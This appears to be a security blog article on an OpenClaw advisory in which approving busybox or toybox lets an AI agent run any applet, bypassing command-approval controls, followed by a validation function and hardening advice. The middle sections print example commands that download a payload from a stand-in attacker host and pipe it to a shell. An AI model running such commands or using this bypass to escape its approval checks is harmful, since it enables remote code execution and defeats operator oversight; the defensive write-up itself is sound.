Learning CenterArticles
Article security April 20, 2026

OpenClaw GHSA-2cq5-mf3v-mx44: Multi-Call Binary Execution Bypass in AI Agent Tools

OpenClaw GHSA-2cq5-mf3v-mx44: Multi-Call Binary Execution Bypass in AI Agent Tools

A critical security advisory (GHSA-2cq5-mf3v-mx44) has been disclosed for OpenClaw, an npm package used by AI agents for secure command execution. The vulnerability affecting versions 2026.2.23 through 2026.4.11 exposes a fundamental weakness in how security controls validate multi-call binaries like busybox and toybox—allowing approved applets to mask unauthorized execution paths. For AI agent operators, this represents a significant trust boundary violation where seemingly benign tool invocations could conceal malicious runtime behavior.

How Multi-Call Binary Execution Bypasses Approval Controls

Multi-call binaries like busybox and toybox consolidate dozens of Unix utilities into a single executable. When invoked, they examine argv[0] (the command name) to determine which applet to execute. A security control that approves "busybox cat" for file reading might not realize that the same binary can execute busybox wget or busybox sh simply by changing the invocation path.

The OpenClaw vulnerability stems from weakened exec approval binding. When an AI agent requests tool execution, OpenClaw validates the command against an allowlist. However, the approval mechanism treated the multi-call binary itself as the approved entity rather than the specific applet being invoked. This architectural oversight meant that once busybox or toybox was approved, any applet it contained became implicitly authorized—even dangerous ones like nc (netcat), wget, or shell interpreters.

The severity is compounded by how AI agents construct commands. An agent might generate:

busybox cat /tmp/data.txt

But the same approval could be exploited to execute:

busybox sh -c "curl attacker.com | sh"

Both commands invoke the same binary, but the security implications differ dramatically.

Real-World Implications for AI Agent Deployments

This vulnerability exposes a broader pattern in AI agent security: the gap between intended tool semantics and actual execution capabilities. When agents use OpenClaw for filesystem operations, network requests, or system introspection, operators expect granular control over what specific actions are permitted. The multi-call binary bypass subverts this expectation by collapsing distinct capabilities behind a single approval boundary.

Consider an AI agent deployment with the following security model:

  1. Agent requests: "Read the configuration file"
  2. System translates to: busybox cat /etc/config
  3. OpenClaw validates "busybox" is approved
  4. Execution proceeds

The vulnerability allows an attacker who compromises the agent's prompt or tool selection logic to pivot this approval into arbitrary code execution:

busybox sh -c "busybox wget -O - attacker.com/payload | busybox sh"

The same binary, same approval, completely different security posture. This is particularly dangerous for agents operating in containerized environments where busybox is often the primary shell and utility provider.

Defensive Measures for AI Agent Operators

The fix in OpenClaw 2026.4.12 strengthens exec approval binding by validating the complete command invocation including applet selection. Operators should upgrade immediately and implement additional defense layers.

Immediate Actions

  1. Upgrade OpenClaw: Update to version 2026.4.12 or later which patches the approval binding weakness
  2. Audit Approved Tools: Review all allowlisted commands for multi-call binaries (busybox, toybox, coreutils multicall builds)
  3. Implement Command Normalization: Parse and validate the full command structure before approval

Code-Level Defenses

When implementing tool execution controls, validate the specific applet being invoked:

import re
import subprocess
from typing import List, Tuple

def validate_multicall_command(
    command: List[str],
    allowed_applets: dict
) -> Tuple[bool, str]:
    """
    Validate multi-call binary execution with applet-level granularity.

    allowed_applets: {"busybox": ["cat", "ls"], "toybox": ["cat"]}
    """
    if not command:
        return False, "Empty command"

    binary = command[0]
    binary_name = binary.split('/')[-1]

    # Check if this is a multi-call binary
    if binary_name in allowed_applets:
        # Multi-call binaries require applet validation
        if len(command) < 2:
            return False, f"{binary_name} requires applet argument"

        applet = command[1]
        if applet not in allowed_applets[binary_name]:
            return False, f"Applet '{applet}' not allowed for {binary_name}"

        # Additional validation: ensure applet isn't a path traversal
        if applet.startswith('/') or '..' in applet:
            return False, "Invalid applet name"

    return True, "Approved"

# Usage in agent tool execution
def execute_tool(command: List[str]) -> str:
    allowed = {
        "busybox": ["cat", "ls", "pwd"],
        "toybox": ["cat", "ls"]
    }

    valid, msg = validate_multicall_command(command, allowed)
    if not valid:
        raise SecurityError(f"Command rejected: {msg}")

    # Execute with restricted environment
    return subprocess.run(
        command,
        capture_output=True,
        text=True,
        timeout=30
    ).stdout

Environment Hardening

Beyond code fixes, harden the execution environment:

  • Use capability-dropping containers: Run agent tools in containers that remove network capabilities after approval
  • Implement syscall filtering: Use seccomp-bpf to restrict what approved binaries can actually do
  • Monitor for applet switches: Alert when a multi-call binary is invoked with different applets than originally approved

Policy Recommendations

For organizations deploying AI agents with tool execution:

  1. Prefer single-purpose binaries: Where possible, use dedicated tools (/bin/cat vs busybox cat)
  2. Implement command hashing: Cache approved command signatures and detect deviations
  3. Separate read/write/network permissions: Don't allow a tool approved for file reading to make network requests
  4. Log all invocations: Record full command lines including applet names for forensic analysis

Key Takeaways

The OpenClaw advisory highlights a critical lesson for AI agent security: approval boundaries must align with actual execution semantics. Multi-call binaries collapse dozens of distinct capabilities behind a single executable, making traditional binary-level approval insufficient. The vulnerability affected versions 2026.2.23 through 2026.4.11 and was patched in 2026.4.12.

For AI agent operators, the path forward requires:

  • Immediate: Upgrade OpenClaw and audit existing tool approvals
  • Short-term: Implement applet-level validation in execution controls
  • Long-term: Design security models that understand tool semantics, not just binary names

The research behind this advisory, published by GitHub Security, demonstrates how execution context can undermine security controls that appear correct at the surface level. When building AI agent infrastructure, always validate what will actually execute—not just what the command appears to request.

AgentGuard360

Built for agents and humans. Comprehensive threat scanning, device hardening, and runtime protection. All without data leaving your machine.

Coming Soon
← Back to Learning Center